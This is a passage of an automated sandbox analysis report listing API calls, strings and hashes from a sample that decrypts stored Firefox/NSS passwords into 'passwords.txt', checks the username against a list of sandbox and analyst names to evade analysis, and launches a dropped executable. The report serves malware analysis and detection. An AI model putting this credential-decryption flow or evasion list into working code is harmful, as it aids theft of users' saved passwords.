                                                                                                                                                                                                              • PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6CB25FA3
                                                                                                                                                                                                              • PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6CB25FB7
                                                                                                                                                                                                              • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6CB25FC4
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB25FDB
                                                                                                                                                                                                              • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CB25FE9
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB25FFE
                                                                                                                                                                                                              • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CB2600C
                                                                                                                                                                                                              • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB26027
                                                                                                                                                                                                              • PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6CB2605A
                                                                                                                                                                                                              • PR_smprintf.NSS3(6CBFAAF9,00000000), ref: 6CB2606A
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB2607C
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB2609A
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB260B2
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB260CE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
                                                                                                                                                                                                              • String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
                                                                                                                                                                                                              • API String ID: 1427204090-154007103
                                                                                                                                                                                                              • Opcode ID: 792643c6c484949697e451695f0fd40d1a0174c295db1ff237438ffc8fb3a09c
                                                                                                                                                                                                              • Instruction ID: 98a2f16a6223ad4baa0a57121fd95cdf9190107eb8fad48bd57a45890a7ae5df
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 792643c6c484949697e451695f0fd40d1a0174c295db1ff237438ffc8fb3a09c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C91F6F4D042C15BEF119F659C81BBB3BA8EF05248F080060EC1D9BB46E729D949C7A3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NSS_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092A8F7
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,0095739C,0095680B), ref: 0092A996
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092A9AE
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092A9B6
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092A9C2
                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092A9CC
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092A9DE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092A9EA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092A9F1
                                                                                                                                                                                                              • StrStrA.SHLWAPI(0092B7F9,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AA02
                                                                                                                                                                                                              • StrStrA.SHLWAPI(-00000010,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AA1C
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AA2F
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AA39
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,009573A0,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AA45
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AA4F
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,009573A4,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AA5B
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AA68
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,-00000010,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AA70
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,009573A8,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AA7C
                                                                                                                                                                                                              • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AA8C
                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AA9C
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AAAF
                                                                                                                                                                                                                • Part of subcall function 0092A7AD: _memset.LIBCMT ref: 0092A7EA
                                                                                                                                                                                                                • Part of subcall function 0092A7AD: lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0092AABC), ref: 0092A805
                                                                                                                                                                                                                • Part of subcall function 0092A7AD: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0092A80D
                                                                                                                                                                                                                • Part of subcall function 0092A7AD: PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0092AABC), ref: 0092A81B
                                                                                                                                                                                                                • Part of subcall function 0092A7AD: PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0092AABC), ref: 0092A82F
                                                                                                                                                                                                                • Part of subcall function 0092A7AD: PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,0092AABC), ref: 0092A86F
                                                                                                                                                                                                                • Part of subcall function 0092A7AD: _memmove.LIBCMT ref: 0092A890
                                                                                                                                                                                                                • Part of subcall function 0092A7AD: PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092A8C1
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AABE
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,009573AC,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AACA
                                                                                                                                                                                                              • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AADA
                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AAEA
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AAFD
                                                                                                                                                                                                                • Part of subcall function 0092A7AD: lstrcatA.KERNEL32(00956801,00956803,?,00000000,00000000,00000000,00000000,00000014,?,0092AABC), ref: 0092A8BA
                                                                                                                                                                                                                • Part of subcall function 0092A7AD: lstrcatA.KERNEL32(00956801,0095680A,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0092AABC), ref: 0092A8D0
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AB0C
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,009573B0,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AB18
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,009573B4,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AB24
                                                                                                                                                                                                              • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AB34
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0092AB52
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0092AB81
                                                                                                                                                                                                              • NSS_Shutdown.NSS3(?,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AB87
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$File$lstrcpy$K11_lstrlen$HeapPointerSlot$AllocAuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalProcessReadShutdownSizeString_memmove_memset
                                                                                                                                                                                                              • String ID: passwords.txt
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_NewLock.NSS3 ref: 6CAB1DA3
                                                                                                                                                                                                                • Part of subcall function 6CB898D0: calloc.MOZGLUE(00000001,00000084,6CAB0936,00000001,?,6CAB102C), ref: 6CB898E5
                                                                                                                                                                                                              • PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6CAB1DB2
                                                                                                                                                                                                                • Part of subcall function 6CAB1240: TlsGetValue.KERNEL32(00000040,?,6CAB116C,NSPR_LOG_MODULES), ref: 6CAB1267
                                                                                                                                                                                                                • Part of subcall function 6CAB1240: EnterCriticalSection.KERNEL32(?,?,?,6CAB116C,NSPR_LOG_MODULES), ref: 6CAB127C
                                                                                                                                                                                                                • Part of subcall function 6CAB1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CAB116C,NSPR_LOG_MODULES), ref: 6CAB1291
                                                                                                                                                                                                                • Part of subcall function 6CAB1240: PR_Unlock.NSS3(?,?,?,?,6CAB116C,NSPR_LOG_MODULES), ref: 6CAB12A0
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAB1DD8
                                                                                                                                                                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6CAB1E4F
                                                                                                                                                                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6CAB1EA4
                                                                                                                                                                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6CAB1ECD
                                                                                                                                                                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6CAB1EEF
                                                                                                                                                                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6CAB1F17
                                                                                                                                                                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CAB1F34
                                                                                                                                                                                                              • PR_SetLogBuffering.NSS3(00004000), ref: 6CAB1F61
                                                                                                                                                                                                              • PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6CAB1F6E
                                                                                                                                                                                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CAB1F83
                                                                                                                                                                                                              • PR_SetLogFile.NSS3(00000000), ref: 6CAB1FA2
                                                                                                                                                                                                              • PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6CAB1FB8
                                                                                                                                                                                                              • OutputDebugStringA.KERNEL32(00000000), ref: 6CAB1FCB
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAB1FD2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
                                                                                                                                                                                                              • String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00944CAF
                                                                                                                                                                                                              • __mtterm.LIBCMT ref: 00944CBB
                                                                                                                                                                                                                • Part of subcall function 0094497A: DecodePointer.KERNEL32(FFFFFFFF), ref: 0094498B
                                                                                                                                                                                                                • Part of subcall function 0094497A: TlsFree.KERNEL32(FFFFFFFF), ref: 009449A5
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00944CD1
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00944CDE
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00944CEB
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00944CF8
                                                                                                                                                                                                              • TlsAlloc.KERNEL32 ref: 00944D48
                                                                                                                                                                                                              • TlsSetValue.KERNEL32(00000000), ref: 00944D63
                                                                                                                                                                                                              • __init_pointers.LIBCMT ref: 00944D6D
                                                                                                                                                                                                              • EncodePointer.KERNEL32 ref: 00944D7E
                                                                                                                                                                                                              • EncodePointer.KERNEL32 ref: 00944D8B
                                                                                                                                                                                                              • EncodePointer.KERNEL32 ref: 00944D98
                                                                                                                                                                                                              • EncodePointer.KERNEL32 ref: 00944DA5
                                                                                                                                                                                                              • DecodePointer.KERNEL32(Function_00024AFE), ref: 00944DC6
                                                                                                                                                                                                              • __calloc_crt.LIBCMT ref: 00944DDB
                                                                                                                                                                                                              • DecodePointer.KERNEL32(00000000), ref: 00944DF5
                                                                                                                                                                                                              • __initptd.LIBCMT ref: 00944E00
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00944E07
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6CB14F51,00000000), ref: 6CB24C50
                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CB14F51,00000000), ref: 6CB24C5B
                                                                                                                                                                                                              • PR_smprintf.NSS3(6CBFAAF9,?,0000002F,?,?,?,00000000,00000000,?,6CB14F51,00000000), ref: 6CB24C76
                                                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6CB14F51,00000000), ref: 6CB24CAE
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB24CC9
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB24CF4
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB24D0B
                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CB14F51,00000000), ref: 6CB24D5E
                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CB14F51,00000000), ref: 6CB24D68
                                                                                                                                                                                                              • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6CB24D85
                                                                                                                                                                                                              • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6CB24DA2
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB24DB9
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB24DCF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                                                                                                                              • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(?,?), ref: 00921A13
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(0095AC74,?), ref: 00921A2E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: NameUserlstrcmpi
                                                                                                                                                                                                              • String ID: CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sand box$WDAGUtilityAccount$maltest$malware$milozs$sandbox$test user$timmy$user$virus
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6CACDDDE
                                                                                                                                                                                                                • Part of subcall function 6CB20FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CAC87ED,00000800,6CABEF74,00000000), ref: 6CB21000
                                                                                                                                                                                                                • Part of subcall function 6CB20FF0: PR_NewLock.NSS3(?,00000800,6CABEF74,00000000), ref: 6CB21016
                                                                                                                                                                                                                • Part of subcall function 6CB20FF0: PL_InitArenaPool.NSS3(00000000,security,6CAC87ED,00000008,?,00000800,6CABEF74,00000000), ref: 6CB2102B
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6CACDDF5
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB210F3
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: EnterCriticalSection.KERNEL32(?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2110C
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21141
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PR_Unlock.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21182
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2119C
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6CACDE34
                                                                                                                                                                                                              • PR_Now.NSS3 ref: 6CACDE93
                                                                                                                                                                                                              • CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6CACDE9D
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CACDEB4
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CACDEC3
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CACDED8
                                                                                                                                                                                                              • PR_smprintf.NSS3(%s%s,?,?), ref: 6CACDEF0
                                                                                                                                                                                                              • PR_smprintf.NSS3(6CBFAAF9,(NULL) (Validity Unknown)), ref: 6CACDF04
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CACDF13
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CACDF22
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6CACDF33
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CACDF3C
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CACDF4B
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CACDF74
                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CACDF8E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
                                                                                                                                                                                                              • String ID: %s%s$(NULL) (Validity Unknown)${???}
                                                                                                                                                                                                              • API String ID: 1882561532-3437882492
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              • _memset.LIBCMT ref: 009327F1
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?,?,?,?), ref: 00932803
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,009566A0), ref: 00932815
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,65158feadb3cebfa5c9a9e36f0d461fe), ref: 00932827
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,009566A4), ref: 00932839
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00932849
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,009566A8), ref: 0093285B
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00932864
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,EMPTY), ref: 00932880
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,009566B4), ref: 00932892
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 009328A2
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,009566B8), ref: 009328B4
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 009328C1
                                                                                                                                                                                                                • Part of subcall function 0093051E: lstrlenA.KERNEL32(?,?,00937300,009566BE,009566BB,?,?,?,?,0093871B), ref: 00930524
                                                                                                                                                                                                                • Part of subcall function 0093051E: lstrcpyA.KERNEL32(00000000,00000000,?,00937300,009566BE,009566BB,?,?,?,?,0093871B), ref: 00930556
                                                                                                                                                                                                                • Part of subcall function 00931C1F: GetSystemTime.KERNEL32(?,009566E2,?), ref: 00931C4E
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 0093241B: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00934ACD), ref: 00932435
                                                                                                                                                                                                              • _memset.LIBCMT ref: 009328F7
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,009566BC,?), ref: 00932964
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00932972
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$lstrcpy$lstrlen$Create_memset$FileObjectProcessSingleSystemTimeWait
                                                                                                                                                                                                              • String ID: .exe$65158feadb3cebfa5c9a9e36f0d461fe$EMPTY
                                                                                                                                                                                                              • API String ID: 141474312-2344941090
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6CB02DEC
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6CB02E00
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CB02E2B
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CB02E43
